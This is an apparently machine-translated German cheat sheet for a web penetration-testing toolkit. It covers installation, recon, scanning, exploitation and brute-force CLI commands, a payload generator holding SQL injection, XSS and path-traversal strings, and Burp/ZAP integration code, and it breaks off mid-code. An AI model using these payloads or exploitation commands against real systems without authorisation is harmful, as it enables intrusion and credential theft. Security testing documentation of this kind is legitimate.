Pegasus-Pentest-Arsenal Cheat Sheet
Überblick
Pegasus-Pentest-Arsenal ist ein umfassendes Web-Sicherheitstest-Toolkit, um verschiedene Aspekte der Web-Anwendung Penetration Tests zu optimieren und zu automatisieren. Entwickelt als All-in-one-Lösung für Sicherheitsexperten, kombiniert dieser Arsenal mehrere Sicherheitstest-Tools und Methoden in eine einheitliche Plattform, die den Prozess der Identifizierung und Nutzung von Web-Anwendung Schwachstellen vereinfacht. Das Toolkit ist besonders wertvoll für Penetrationsprüfer, die Webanwendungen schnell über verschiedene Technologien und Frameworks bewerten müssen.
Das Arsenal zeichnet sich durch seine modulare Architektur und umfangreiche Automatisierungsfunktionen aus. Anstatt Sicherheitsexperten manuell zu konfigurieren und auszuführen Dutzende von verschiedenen Werkzeugen, Pegasus-Pentest-Arsenal bietet eine optimierte Schnittstelle, die verschiedene Sicherheitstests inszeniert. Die Plattform umfasst automatisierte Aufklärungs-, Verwundbarkeits-Scanning-, Ausbeutungsmodule und Reporting-Funktionen, sodass sie sowohl für schnelle Sicherheitsbewertungen als auch für umfassende Penetrationstests geeignet ist.
Das Toolkit enthält branchenübliche Sicherheitstestmethoden und integriert sich mit beliebten Sicherheitstools, um eine umfassende Erfassung von Web Application Attack Vektoren zu gewährleisten. Es unterstützt Tests für OWASP Top 10 Schwachstellen, fortgeschrittene Injektionsangriffe, Authentifizierungs-Bypasses, Sitzungsmanagement-Fehler und Geschäftslogik Schwachstellen. Die Automatisierungsfunktionen der Plattform verringern die Zeit, die für Routinetestaufgaben benötigt wird, und halten gleichzeitig die für professionelle Sicherheitsbewertungen erforderliche Durchlässigkeit bei.
Pegasus-Pentest-Arsenal ist sowohl mit Anfänger als auch mit erfahrenen Penetrationsprüfern konzipiert. Die Plattform bietet geführte Workflows für Anfänger und bietet erweiterte Anpassungsmöglichkeiten für erfahrene Profis. Die Reporting-Funktionen erzeugen professionelle Dokumentationen, die für die Bereitstellung von Kunden, Compliance-Anforderungen und interne Sicherheitsbewertungen geeignet sind.
Installation
Docker Installation (empfohlen)
```bash
Clone Pegasus-Pentest-Arsenal repository
git clone https://github.com/pegasus-arsenal/pegasus-pentest-arsenal.git cd pegasus-pentest-arsenal
Build Docker image
docker build -t pegasus-arsenal .
Run Pegasus Arsenal container
docker run -d -p 8080:8080 -p 8443:8443 --name pegasus-arsenal pegasus-arsenal
Run with persistent data
docker run -d -p 8080:8080 -p 8443:8443 \ -v pegasus_data:/app/data \ -v pegasus_reports:/app/reports \ --name pegasus-arsenal pegasus-arsenal
Access Pegasus Arsenal
Web interface: http://localhost:8080
HTTPS interface: https://localhost:8443
Stop container
docker stop pegasus-arsenal
Remove container
docker rm pegasus-arsenal ```_
Docker komponiert Installation
```yaml
Create docker-compose.yml
cat << 'EOF' > docker-compose.yml version: '3.8'
services: pegasus-arsenal: build: . container_name: pegasus-arsenal ports: - "8080: 8080" - "8443: 8443" - "1337: 1337" # Additional service port volumes: - pegasus_data: /app/data - pegasus_reports: /app/reports - pegasus_wordlists: /app/wordlists - ./custom_modules: /app/custom_modules environment: - PEGASUS_MODE=production - PEGASUS_DEBUG=false - PEGASUS_API_KEY=your_api_key_here restart: unless-stopped networks: - pegasus_network
pegasus-db: image: postgres:13 container_name: pegasus-db environment: - POSTGRES_DB=pegasus - POSTGRES_USER=pegasus - POSTGRES_PASSWORD=pegasus_password volumes: - pegasus_db_data: /var/lib/postgresql/data networks: - pegasus_network
volumes: pegasus_data: pegasus_reports: pegasus_wordlists: pegasus_db_data:
networks: pegasus_network: driver: bridge EOF
Start Pegasus Arsenal
docker-compose up -d
View logs
docker-compose logs -f pegasus-arsenal
Stop services
docker-compose down
Stop and remove volumes
docker-compose down -v ```_
Manuelle Installation auf Ubuntu/Debian
```bash
Update system
sudo apt update && sudo apt upgrade -y
Install dependencies
sudo apt install -y python3 python3-pip python3-venv git curl wget \ nmap sqlmap nikto dirb gobuster wfuzz hydra john \ metasploit-framework burpsuite zaproxy
Install Node.js and npm
curl -fsSL https://deb.nodesource.com/setup_16.x|sudo -E bash - sudo apt install -y nodejs
Clone repository
git clone https://github.com/pegasus-arsenal/pegasus-pentest-arsenal.git cd pegasus-pentest-arsenal
Create virtual environment
python3 -m venv venv source venv/bin/activate
Install Python dependencies
pip install -r requirements.txt
Install Node.js dependencies
npm install
Configure database
sudo apt install postgresql postgresql-contrib sudo -u postgres createdb pegasus sudo -u postgres createuser pegasus sudo -u postgres psql -c "ALTER USER pegasus PASSWORD 'pegasus_password';"
Initialize database
python3 manage.py migrate
Create superuser
python3 manage.py createsuperuser
Start Pegasus Arsenal
python3 manage.py runserver 0.0.0.0:8080 ```_
Installation auf CentOS/RHEL
```bash
Install EPEL repository
sudo yum install epel-release -y
Install dependencies
sudo yum groupinstall "Development Tools" -y sudo yum install python3 python3-pip git curl wget \ nmap sqlmap nikto dirb hydra john -y
Install additional security tools
sudo yum install snapd -y sudo systemctl enable --now snapd.socket sudo snap install burpsuite-community-edition
Clone and setup
git clone https://github.com/pegasus-arsenal/pegasus-pentest-arsenal.git cd pegasus-pentest-arsenal
Setup Python environment
python3 -m venv venv source venv/bin/activate pip install -r requirements.txt
Install PostgreSQL
sudo yum install postgresql postgresql-server postgresql-contrib -y sudo postgresql-setup initdb sudo systemctl start postgresql sudo systemctl enable postgresql
Configure database
sudo -u postgres createdb pegasus sudo -u postgres createuser pegasus sudo -u postgres psql -c "ALTER USER pegasus PASSWORD 'pegasus_password';"
Start application
python3 manage.py runserver 0.0.0.0:8080 ```_
Kubernetes Bereitstellung
```yaml
Create pegasus-deployment.yaml
cat << 'EOF' > pegasus-deployment.yaml apiVersion: apps/v1 kind: Deployment metadata: name: pegasus-arsenal labels: app: pegasus-arsenal spec: replicas: 2 selector: matchLabels: app: pegasus-arsenal template: metadata: labels: app: pegasus-arsenal spec: containers: - name: pegasus-arsenal image: pegasus-arsenal:latest ports: - containerPort: 8080 - containerPort: 8443 env: - name: PEGASUS_MODE value: "production" - name: DATABASE_URL value: "postgresql://pegasus:password@pegasus-db:5432/pegasus" volumeMounts: - name: pegasus-data mountPath: /app/data - name: pegasus-reports mountPath: /app/reports volumes: - name: pegasus-data persistentVolumeClaim: claimName: pegasus-data-pvc - name: pegasus-reports persistentVolumeClaim: claimName: pegasus-reports-pvc
apiVersion: v1 kind: Service metadata: name: pegasus-arsenal-service spec: selector: app: pegasus-arsenal ports: - name: http port: 8080 targetPort: 8080 - name: https port: 8443 targetPort: 8443 type: LoadBalancer
apiVersion: apps/v1 kind: Deployment metadata: name: pegasus-db spec: replicas: 1 selector: matchLabels: app: pegasus-db template: metadata: labels: app: pegasus-db spec: containers: - name: postgres image: postgres:13 env: - name: POSTGRES_DB value: "pegasus" - name: POSTGRES_USER value: "pegasus" - name: POSTGRES_PASSWORD value: "password" volumeMounts: - name: postgres-data mountPath: /var/lib/postgresql/data volumes: - name: postgres-data persistentVolumeClaim: claimName: postgres-data-pvc
apiVersion: v1 kind: Service metadata: name: pegasus-db spec: selector: app: pegasus-db ports: - port: 5432 targetPort: 5432 EOF
Deploy to Kubernetes
kubectl apply -f pegasus-deployment.yaml
Check deployment status
kubectl get pods kubectl get services
Access Pegasus Arsenal
kubectl port-forward service/pegasus-arsenal-service 8080: 8080 ```_
Erstkonfiguration
Erst-Zeit-Setup
```bash
Access Pegasus Arsenal web interface
Navigate to http://localhost:8080
Initial configuration wizard
1. Set admin credentials
2. Configure database connection
3. Set API keys for external services
4. Configure tool paths
5. Set up reporting preferences
Command-line configuration
python3 manage.py configure --interactive
Non-interactive configuration
python3 manage.py configure \ --admin-user admin \ --admin-password secure_password \ --database-url postgresql://pegasus:password@localhost:5432/pegasus \ --api-keys-file api_keys.json ```_
API Keys Konfiguration
```bash
Create API keys configuration file
cat << 'EOF' > api_keys.json \\{ "virustotal": "your_virustotal_api_key", "shodan": "your_shodan_api_key", "censys": "your_censys_api_key", "securitytrails": "your_securitytrails_api_key", "hunter": "your_hunter_api_key", "dehashed": "your_dehashed_api_key", "hibp": "your_hibp_api_key", "whoisxml": "your_whoisxml_api_key" \\} EOF
Load API keys
python3 manage.py load_api_keys --file api_keys.json
Test API connectivity
python3 manage.py test_apis
Update individual API key
python3 manage.py set_api_key --service virustotal --key your_new_key ```_
Werkzeugkonfiguration
```bash
Configure external tool paths
cat << 'EOF' > tool_config.json \\{ "nmap": "/usr/bin/nmap", "sqlmap": "/usr/bin/sqlmap", "nikto": "/usr/bin/nikto", "dirb": "/usr/bin/dirb", "gobuster": "/usr/bin/gobuster", "wfuzz": "/usr/bin/wfuzz", "hydra": "/usr/bin/hydra", "john": "/usr/bin/john", "hashcat": "/usr/bin/hashcat", "metasploit": "/usr/bin/msfconsole", "burpsuite": "/usr/bin/burpsuite", "zaproxy": "/usr/bin/zaproxy" \\} EOF
Load tool configuration
python3 manage.py configure_tools --file tool_config.json
Verify tool installation
python3 manage.py verify_tools
Update tool paths
python3 manage.py update_tool_path --tool nmap --path /opt/nmap/bin/nmap ```_
Kernmodule und Funktionen
Reconnaissance Modul
```bash
Passive reconnaissance
pegasus-cli recon passive --target example.com
Active reconnaissance
pegasus-cli recon active --target example.com --deep
Subdomain enumeration
pegasus-cli recon subdomains --target example.com \ --wordlist /app/wordlists/subdomains.txt \ --dns-bruteforce \ --certificate-transparency
Port scanning
pegasus-cli recon ports --target example.com \ --ports 1-65535 \ --service-detection \ --os-detection
Technology stack identification
pegasus-cli recon tech --target example.com \ --fingerprint-cms \ --identify-frameworks \ --detect-waf
OSINT gathering
pegasus-cli recon osint --target example.com \ --social-media \ --email-harvesting \ --leaked-credentials ```_
Schwachstelle Scanning Modul
```bash
Comprehensive vulnerability scan
pegasus-cli scan vuln --target http://example.com \ --scan-type comprehensive \ --include-owasp-top10
Specific vulnerability types
pegasus-cli scan vuln --target http://example.com \ --scan-types sqli,xss,csrf,lfi,rfi
Authenticated scanning
pegasus-cli scan vuln --target http://example.com \ --auth-type form \ --username admin \ --password password \ --login-url /login
API vulnerability scanning
pegasus-cli scan api --target http://api.example.com \ --swagger-url /swagger.json \ --test-authentication \ --test-authorization
SSL/TLS security assessment
pegasus-cli scan ssl --target example.com \ --check-certificates \ --test-ciphers \ --check-vulnerabilities
Web application firewall detection
pegasus-cli scan waf --target http://example.com \ --detection-methods all \ --bypass-attempts ```_
Exploitation Modul
```bash
SQL injection exploitation
pegasus-cli exploit sqli --target http://example.com/page.php?id=1 \ --technique union \ --dump-database \ --extract-passwords
Cross-site scripting exploitation
pegasus-cli exploit xss --target http://example.com/search \ --parameter q \ --payload-type reflected \ --generate-poc
File inclusion exploitation
pegasus-cli exploit lfi --target http://example.com/page.php?file=index \ --technique traversal \ --extract-files /etc/passwd,/etc/shadow
Command injection exploitation
pegasus-cli exploit cmdi --target http://example.com/ping.php \ --parameter host \ --technique blind \ --execute-commands
Authentication bypass
pegasus-cli exploit auth --target http://example.com/login \ --technique sqli \ --username-field user \ --password-field pass
Session hijacking
pegasus-cli exploit session --target http://example.com \ --technique prediction \ --cookie-name PHPSESSID ```_
Brute Force Modul
```bash
Login brute force
pegasus-cli bruteforce login --target http://example.com/login \ --username-list /app/wordlists/usernames.txt \ --password-list /app/wordlists/passwords.txt \ --threads 10
Directory brute force
pegasus-cli bruteforce dirs --target http://example.com \ --wordlist /app/wordlists/directories.txt \ --extensions php,asp,aspx,jsp \ --recursive
Subdomain brute force
pegasus-cli bruteforce subdomains --target example.com \ --wordlist /app/wordlists/subdomains.txt \ --resolver 8.8.8.8 \ --threads 50
Parameter brute force
pegasus-cli bruteforce params --target http://example.com/page.php \ --wordlist /app/wordlists/parameters.txt \ --method GET,POST
Hash cracking
pegasus-cli bruteforce hash --hash-file hashes.txt \ --hash-type md5 \ --wordlist /app/wordlists/rockyou.txt \ --rules best64
SSH brute force
pegasus-cli bruteforce ssh --target 192.168.1.100 \ --username-list users.txt \ --password-list passwords.txt \ --threads 5 ```_
Advanced Testing Techniques
Entwicklung der Nutzlast
```python
!/usr/bin/env python3
Custom payload generator for Pegasus Arsenal
import json import base64 from urllib.parse import quote
class PegasusPayloadGenerator: def init(self): self.payloads = \\{ 'sqli': [], 'xss': [], 'lfi': [], 'cmdi': [], 'xxe': [] \\}
def generate_sqli_payloads(self, target_db='mysql'):
"""Generate SQL injection payloads"""
base_payloads = [
"' OR '1'='1",
"' OR 1=1 --",
"' UNION SELECT null, version() --",
"' AND (SELECT COUNT(*) FROM information_schema.tables)>0 --"
]
if target_db == 'mysql':
base_payloads.extend([
"' UNION SELECT user(), database() --",
"' AND (SELECT SUBSTRING(@@version,1,1))='5' --"
])
elif target_db == 'postgresql':
base_payloads.extend([
"' UNION SELECT current_user, current_database() --",
"' AND (SELECT version()) LIKE '%PostgreSQL%' --"
])
self.payloads['sqli'] = base_payloads
return base_payloads
def generate_xss_payloads(self, context='html'):
"""Generate XSS payloads for different contexts"""
html_payloads = [
"<script>alert('XSS')</script>",
"<img src=x onerror=alert('XSS')>",
"<svg onload=alert('XSS')>",
"<iframe src=javascript:alert('XSS')>"
]
js_payloads = [
"';alert('XSS');//",
"\";alert('XSS');//",
"'-alert('XSS')-'",
"\"-alert('XSS')-\""
]
attr_payloads = [
"\" onmouseover=alert('XSS') \"",
"' onmouseover=alert('XSS') '",
"javascript:alert('XSS')"
]
if context == 'html':
self.payloads['xss'] = html_payloads
elif context == 'javascript':
self.payloads['xss'] = js_payloads
elif context == 'attribute':
self.payloads['xss'] = attr_payloads
else:
self.payloads['xss'] = html_payloads + js_payloads + attr_payloads
return self.payloads['xss']
def generate_lfi_payloads(self, os_type='linux'):
"""Generate Local File Inclusion payloads"""
linux_payloads = [
"../../../etc/passwd",
"....//....//....//etc/passwd",
"..%252f..%252f..%252fetc%252fpasswd",
"/etc/passwd%00",
"php://filter/convert.base64-encode/resource=../../../etc/passwd"
]
windows_payloads = [
"..\\..\\..\\windows\\system32\\drivers\\etc\\hosts",
"....\\\\....\\\\....\\\\windows\\\\win.ini",
"..%255c..%255c..%255cwindows%255cwin.ini",
"C:\\windows\\win.ini%00"
]
if os_type == 'linux':
self.payloads['lfi'] = linux_payloads
elif os_type == 'windows':
self.payloads['lfi'] = windows_payloads
else:
self.payloads['lfi'] = linux_payloads + windows_payloads
return self.payloads['lfi']
def encode_payloads(self, payloads, encoding='url'):
"""Encode payloads for bypass attempts"""
encoded = []
for payload in payloads:
if encoding == 'url':
encoded.append(quote(payload))
elif encoding == 'base64':
encoded.append(base64.b64encode(payload.encode()).decode())
elif encoding == 'html':
encoded.append(''.join(f'&#\\\\{ord(c)\\\\};' for c in payload))
return encoded
def export_payloads(self, filename='custom_payloads.json'):
"""Export payloads to JSON file"""
with open(filename, 'w') as f:
json.dump(self.payloads, f, indent=2)
print(f"Payloads exported to \\\\{filename\\\\}")
Usage example
if name == "main": generator = PegasusPayloadGenerator()
# Generate payloads
sqli_payloads = generator.generate_sqli_payloads('mysql')
xss_payloads = generator.generate_xss_payloads('html')
lfi_payloads = generator.generate_lfi_payloads('linux')
# Encode for bypass
encoded_sqli = generator.encode_payloads(sqli_payloads, 'url')
# Export all payloads
generator.export_payloads()
```_
Automatische Testing Workflows
```bash
!/bin/bash
Pegasus Arsenal automated testing workflow
TARGET="$1" OUTPUT_DIR="pegasus_results_$(date +%Y%m%d_%H%M%S)"
if [ -z "$TARGET" ]; then
echo "Usage: $0
echo "[*] Starting Pegasus Arsenal automated testing for $TARGET" mkdir -p "$OUTPUT_DIR"
Phase 1: Reconnaissance
echo "[*] Phase 1: Reconnaissance" pegasus-cli recon passive --target "$TARGET" --output "$OUTPUT_DIR/recon_passive.json" pegasus-cli recon active --target "$TARGET" --output "$OUTPUT_DIR/recon_active.json" pegasus-cli recon subdomains --target "$TARGET" --output "$OUTPUT_DIR/subdomains.json"
Phase 2: Port Scanning
echo "[*] Phase 2: Port Scanning" pegasus-cli recon ports --target "$TARGET" --ports 1-65535 --output "$OUTPUT_DIR/ports.json"
Phase 3: Technology Detection
echo "[*] Phase 3: Technology Detection" pegasus-cli recon tech --target "$TARGET" --output "$OUTPUT_DIR/technology.json"
Phase 4: Vulnerability Scanning
echo "[*] Phase 4: Vulnerability Scanning" pegasus-cli scan vuln --target "http://$TARGET" --scan-type comprehensive --output "$OUTPUT_DIR/vulnerabilities.json"
Phase 5: SSL/TLS Assessment
echo "[*] Phase 5: SSL/TLS Assessment" pegasus-cli scan ssl --target "$TARGET" --output "$OUTPUT_DIR/ssl_assessment.json"
Phase 6: Directory Brute Force
echo "[*] Phase 6: Directory Brute Force" pegasus-cli bruteforce dirs --target "http://$TARGET" --output "$OUTPUT_DIR/directories.json"
Phase 7: Exploitation (if vulnerabilities found)
echo "[*] Phase 7: Exploitation" if grep -q "sql_injection" "$OUTPUT_DIR/vulnerabilities.json"; then pegasus-cli exploit sqli --target "http://$TARGET" --auto-detect --output "$OUTPUT_DIR/sqli_exploitation.json" fi
if grep -q "xss" "$OUTPUT_DIR/vulnerabilities.json"; then pegasus-cli exploit xss --target "http://$TARGET" --auto-detect --output "$OUTPUT_DIR/xss_exploitation.json" fi
Phase 8: Report Generation
echo "[*] Phase 8: Report Generation" pegasus-cli report generate --input-dir "$OUTPUT_DIR" --format html --output "$OUTPUT_DIR/final_report.html" pegasus-cli report generate --input-dir "$OUTPUT_DIR" --format pdf --output "$OUTPUT_DIR/final_report.pdf"
echo "[] Testing complete. Results saved to $OUTPUT_DIR" echo "[] Open $OUTPUT_DIR/final_report.html to view the results" ```_
Personalentwicklung
```python
!/usr/bin/env python3
Custom Pegasus Arsenal module template
from pegasus.core.module import BaseModule from pegasus.core.logger import get_logger import requests import json
class CustomWebTestModule(BaseModule): """Custom web application testing module"""
def __init__(self):
super().__init__()
self.name = "Custom Web Test"
self.description = "Custom web application security testing module"
self.version = "1.0.0"
self.author = "Security Researcher"
self.logger = get_logger(__name__)
# Module options
self.options = \\\\{
'target': \\\\{
'description': 'Target URL',
'required': True,
'default': ''
\\\\},
'timeout': \\\\{
'description': 'Request timeout in seconds',
'required': False,
'default': 10
\\\\},
'user_agent': \\\\{
'description': 'Custom User-Agent string',
'required': False,
'default': 'Pegasus-Arsenal/1.0'
\\\\}
\\\\}
def validate_options(self):
"""Validate module options"""
if not self.options['target']['value']:
raise ValueError("Target URL is required")
if not self.options['target']['value'].startswith(('http://', 'https://')):
raise ValueError("Target must be a valid HTTP/HTTPS URL")
def run(self):
"""Execute the module"""
self.logger.info(f"Starting custom web test for \\\\{self.options['target']['value']\\\\}")
try:
self.validate_options()
# Custom testing logic
results = self.perform_custom_tests()
# Process and return results
return self.format_results(results)
except Exception as e:
self.logger.error(f"Module execution failed: \\\\{e\\\\}")
return \\\\{'error': str(e)\\\\}
def perform_custom_tests(self):
"""Perform custom security tests"""
target = self.options['target']['value']
timeout = int(self.options['timeout']['value'])
user_agent = self.options['user_agent']['value']
headers = \\\\{'User-Agent': user_agent\\\\}
results = \\\\{
'target': target,
'tests': []
\\\\}
# Test 1: Check for sensitive files
sensitive_files = [
'/robots.txt',
'/.htaccess',
'/web.config',
'/backup.sql',
'/config.php.bak'
]
for file_path in sensitive_files:
test_url = target.rstrip('/') + file_path
try:
response = requests.get(test_url, headers=headers, timeout=timeout)
test_result = \\\\{
'test_name': 'Sensitive File Check',
'url': test_url,
'status_code': response.status_code,
'vulnerable': response.status_code == 200,
'details': f"File \\\\{file_path\\\\} accessible" if response.status_code == 200 else None
\\\\}
results['tests'].append(test_result)
except requests.RequestException as e:
self.logger.warning(f"Request failed for \\\\{test_url\\\\}: \\\\{e\\\\}")
# Test 2: Check for common vulnerabilities
vuln_tests = [
\\\\{
'name': 'XSS Test',
'payload': '<script>alert("XSS")</script>',
'parameter': 'q'
\\\\},
\\\\{
'name': 'SQL Injection Test',
'payload': "' OR '1'='1",
'parameter': 'id'
\\\\}
]
for test in vuln_tests:
test_url = f"\\\\{target\\\\}?\\\\{test['parameter']\\\\}=\\\\{test['payload']\\\\}"
try:
response = requests.get(test_url, headers=headers, timeout=timeout)
vulnerable = test['payload'] in response.text
test_result = \\\\{
'test_name': test['name'],
'url': test_url,
'vulnerable': vulnerable,
'payload': test['payload'],
'details': f"Payload reflected in response" if vulnerable else None
\\\\}
results['tests'].append(test_result)
except requests.RequestException as e:
self.logger.warning(f"Request failed for \\\\{test_url\\\\}: \\\\{e\\\\}")
return results
def format_results(self, results):
"""Format results for output"""
formatted = \\\\{
'module': self.name,
'target': results['target'],
'timestamp': self.get_timestamp(),
'summary': \\\\{
'total_tests': len(results['tests']),
'vulnerabilities_found': sum(1 for test in results['tests'] if test.get('vulnerable', False))
\\\\},
'vulnerabilities': [test for test in results['tests'] if test.get('vulnerable', False)],
'all_tests': results['tests']
\\\\}
return formatted
Register module with Pegasus Arsenal
def register_module(): return CustomWebTestModule() ```_
Integration von Sicherheitswerkzeugen
Integration von Burp Suite
```python
!/usr/bin/env python3
Pegasus Arsenal - Burp Suite integration
import requests import json import base64
class PegasusBurpIntegration: def init(self, burp_api_url="http://localhost:1337", api_key=None): self.burp_api_url = burp_api_url self.api_key = api_key self.session = requests.Session()
if api_key:
self.session.headers.update(\\\\{'X-API-Key': api_key\\\\})
def start_scan(self, target_url, scan_type="crawl_and_audit"):
"""Start Burp Suite scan via API"""
scan_config = \\\\{
"scan_configurations": [
\\\\{
"name": scan_type,
"type": "NamedConfiguration"
\\\\}
],
"urls": [target_url]
\\\\}
response = self.session.post(
f"\\\\{self.burp_api_url\\\\}/v0.1/scan",
json=scan_config
)
if response.status_code == 201:
scan_id = response.headers.get('Location').split('/')[-1]
return scan_id
else:
raise Exception(f"Failed to start scan: \\\\{response.text\\\\}")
def get_scan_status(self, scan_id):
"""Get scan status"""
response = self.session.get(f"\\\\{self.burp_api_url\\\\}/v0.1/scan/\\\\{scan_id\\\\}")
if response.status_code == 200:
return response.json()
else:
raise Exception(f"Failed to get scan status: \\\\{response.text\\\\}")
def get_scan_issues(self, scan_id):
"""Get scan issues/vulnerabilities"""
response = self.session.get(f"\\\\{self.burp_api_url\\\\}/v0.1/scan/\\\\{scan_id\\\\}/issues")
if response.status_code == 200:
return response.json()
else:
raise Exception(f"Failed to get scan issues: \\\\{response.text\\\\}")
def export_scan_report(self, scan_id, report_format="HTML"):
"""Export scan report"""
export_config = \\\\{
"scan_id": scan_id,
"report_type": report_format
\\\\}
response = self.session.post(
f"\\\\{self.burp_api_url\\\\}/v0.1/scan/\\\\{scan_id\\\\}/report",
json=export_config
)
if response.status_code == 200:
return response.content
else:
raise Exception(f"Failed to export report: \\\\{response.text\\\\}")
Integration with Pegasus Arsenal
def integrate_with_pegasus(target_url): """Integrate Burp Suite scan with Pegasus Arsenal""" burp = PegasusBurpIntegration()
# Start scan
scan_id = burp.start_scan(target_url)
print(f"Started Burp Suite scan: \\\\{scan_id\\\\}")
# Monitor scan progress
while True:
status = burp.get_scan_status(scan_id)
if status['scan_status'] == 'succeeded':
print("Scan completed successfully")
break
elif status['scan_status'] == 'failed':
print("Scan failed")
break
else:
print(f"Scan in progress: \\\\{status['scan_metrics']['crawl_requests_made']\\\\} requests made")
time.sleep(30)
# Get issues
issues = burp.get_scan_issues(scan_id)
# Export report
report = burp.export_scan_report(scan_id, "HTML")
with open(f"burp_report_\\\\{scan_id\\\\}.html", "wb") as f:
f.write(report)
return issues
```_
OWASP ZAP Integration
```python
!/usr/bin/env python3
Pegasus Arsenal - OWASP ZAP integration
from zapv2 import ZAPv2 import time import json
class PegasusZAPIntegration: def init(self, zap_proxy="http://localhost:8080"): self.zap = ZAPv2(proxies=\\{'http': zap_proxy, 'https': zap_proxy\\})
def spider_target(self, target_url):
"""Spider target application"""
print(f"Starting spider scan for \\\\{target_url\\\\}")
scan_id = self.zap.spider.scan(target_url)
# Wait for spider to complete
while int(self.zap.spider.status(scan_id)) < 100:
print(f"Spider progress: \\\\{self.zap.spider.status(scan_id)\\\\}%")
time.sleep(5)
print("Spider scan completed")
return self.zap.spider.results(scan_id)
def active_scan(self, target_url):
"""Perform active security scan"""
print(f"Starting active scan for \\\\{target_url\\\\}")
scan_id = self.zap.ascan.scan(target_url)
# Wait for active scan to complete
while int(self.zap.ascan.status(scan_id)) < 100:
print(f"Active scan progress: \\\\{self.zap.ascan.status(scan_id)\\\\}%")
time.sleep(10)
print("Active scan completed")
return scan_id
def get_alerts(self, baseurl=None):
"""Get security alerts"""
return self.zap.core.alerts(baseurl)
def generate_report(self, format_type="HTML"):
"""Generate security report"""
if format_type.upper() == "HTML":
return self.zap.core.htmlreport()
elif format_type.upper() == "XML":
return self.zap.core.xmlreport()
elif format_type.upper() == "JSON":
return self.zap.core.jsonreport()
else:
raise ValueError("Unsupported report format")
def comprehensive_scan(self, target_url):
"""Perform comprehensive security assessment"""
results = \\\\{
'target': target_url,
'spider_results': [],
'alerts': [],
'scan_summary': \\\\{\\\\}
\\\\}
# Spider the application
spider_results = self.spider_target(target_url)
results['spider_results'] = spider_results
# Perform active scan
scan_id = self.active_scan(target_url)
# Get alerts
alerts = self.get_alerts(target_url)
results['alerts'] = alerts
# Generate summary
results['scan_summary'] = \\\\{
'total_urls_found': len(spider_results),
'total_alerts': len(alerts),
'high_risk_alerts': len([a for a in alerts if a['risk'] == 'High']),
'medium_risk_alerts': len([a for a in alerts if a['risk'] == 'Medium']),
'low_risk_alerts': len([a for a in alerts if a['risk'] == 'Low'])
\\\\}
return results
Integration function
def run_zap_scan_for_pegasus(target_url): """Run ZAP scan and integrate with Pegasus Arsenal""" zap_integration = PegasusZAPIntegration()
# Perform comprehensive scan
results = zap_integration.comprehensive_scan(target_url)
# Generate reports
html_report = zap_integration.generate_report("HTML")
json_report = zap_integration.generate_report("JSON")
# Save reports
with open(f"zap_report_\\\\{target_url.replace('://', '_').replace('/', '_')\\\\}.html", "w") as f:
f.write(html_report)
with open(f"zap_results_\\\\{target_url.replace('://', '_').replace('/', '_')\\\\}.json", "w") as f:
f.write(json_report)
return results
```_
Reporting und Dokumentation
Automatisierte Report Generation
```python
!/usr/bin/env python3
Pegasus Arsenal automated report generator
import json import datetime from jinja2 import Template import pdfkit
class PegasusReportGenerator: def init(self): self.report_data = \\{\\} self.templates = \\{ 'executive_summary': self.get_executive_template(), 'technical_details': self.get_technical_template(), 'recommendations': self.get_recommendations_template() \\}
def load_scan_results(self, results_file):
"""Load scan results from JSON file"""
with open(results_file, 'r') as f:
self.report_data = json.load(f)
def generate_executive_summary(self):
"""Generate executive summary"""
template = Template(self.templates['executive_summary'])
# Calculate risk metrics
total_vulns = len(self.report_data.get('vulnerabilities', []))
high_risk = len([v for v in self.report_data.get('vulnerabilities', []) if v.get('severity') == 'High'])
medium_risk = len([v for v in self.report_data.get('vulnerabilities', []) if v.get('severity') == 'Medium'])
low_risk = len([v for v in self.report_data.get('vulnerabilities', []) if v.get('severity') == 'Low'])
summary_data = \\\\{
'target': self.report_data.get('target', 'Unknown'),
'scan_date': datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'),
'total_vulnerabilities': total_vulns,
'high_risk_count': high_risk,
'medium_risk_count': medium_risk,
'low_risk_count': low_risk,
'risk_score': self.calculate_risk_score(high_risk, medium_risk, low_risk)
\\\\}
return template.render(**summary_data)
def generate_technical_details(self):
"""Generate technical details section"""
template = Template(self.templates['technical_details'])
return template.render(
vulnerabilities=self.report_data.get('vulnerabilities', []),
scan_details=self.report_data.get('scan_details', \\\\{\\\\}),
target_info=self.report_data.get('target_info', \\\\{\\\\})
)
def generate_recommendations(self):
"""Generate recommendations section"""
template = Template(self.templates['recommendations'])
# Generate recommendations based on vulnerabilities found
recommendations = self.generate_vuln_recommendations()
return template.render(recommendations=recommendations)
def generate_full_report(self, output_format='html'):
"""Generate complete security assessment report"""
report_sections = \\\\{
'executive_summary': self.generate_executive_summary(),
'technical_details': self.generate_technical_details(),
'recommendations': self.generate_recommendations()
\\\\}
full_report_template = """
<!DOCTYPE html>
<html>
<head>
<title>Pegasus Arsenal Security Assessment Report</title>
<style>
body \\\\{ font-family: Arial, sans-serif; margin: 40px; \\\\}
.header \\\\{ text-align: center; border-bottom: 2px solid #333; padding-bottom: 20px; \\\\}
.section \\\\{ margin: 30px 0; \\\\}
.vulnerability \\\\{ border: 1px solid #ddd; padding: 15px; margin: 10px 0; \\\\}
.high-risk \\\\{ border-left: 5px solid #d32f2f; \\\\}
.medium-risk \\\\{ border-left: 5px solid #f57c00; \\\\}
.low-risk \\\\{ border-left: 5px solid #388e3c; \\\\}
.recommendation \\\\{ background: #f5f5f5; padding: 15px; margin: 10px 0; \\\\}
</style>
</head>
<body>
<div class="header">
<h1>Security Assessment Report</h1>
<h2>Generated by Pegasus Arsenal</h2>
</div>
<div class="section">
<h2>Executive Summary</h2>
\\\\{\\\\{ executive_summary \\\\}\\\\}
</div>
<div class="section">
<h2>Technical Details</h2>
\\\\{\\\\{ technical_details \\\\}\\\\}
</div>
<div class="section">
<h2>Recommendations</h2>
\\\\{\\\\{ recommendations \\\\}\\\\}
</div>
</body>
</html>
"""
template = Template(full_report_template)
html_report = template.render(**report_sections)
if output_format.lower() == 'html':
return html_report
elif output_format.lower() == 'pdf':
return pdfkit.from_string(html_report, False)
else:
raise ValueError("Unsupported output format")
def calculate_risk_score(self, high, medium, low):
"""Calculate overall risk score"""
score = (high * 10) + (medium * 5) + (low * 1)
if score >= 50:
return "Critical"
elif score >= 25:
return "High"
elif score >= 10:
return "Medium"
else:
return "Low"
def generate_vuln_recommendations(self):
"""Generate vulnerability-specific recommendations"""
recommendations = []
vuln_types = set(v.get('type', 'Unknown') for v in self.report_data.get('vulnerabilities', []))
recommendation_map = \\\\{
'SQL Injection': \\\\{
'title': 'SQL Injection Prevention',
'description': 'Implement parameterized queries and input validation',
'priority': 'High',
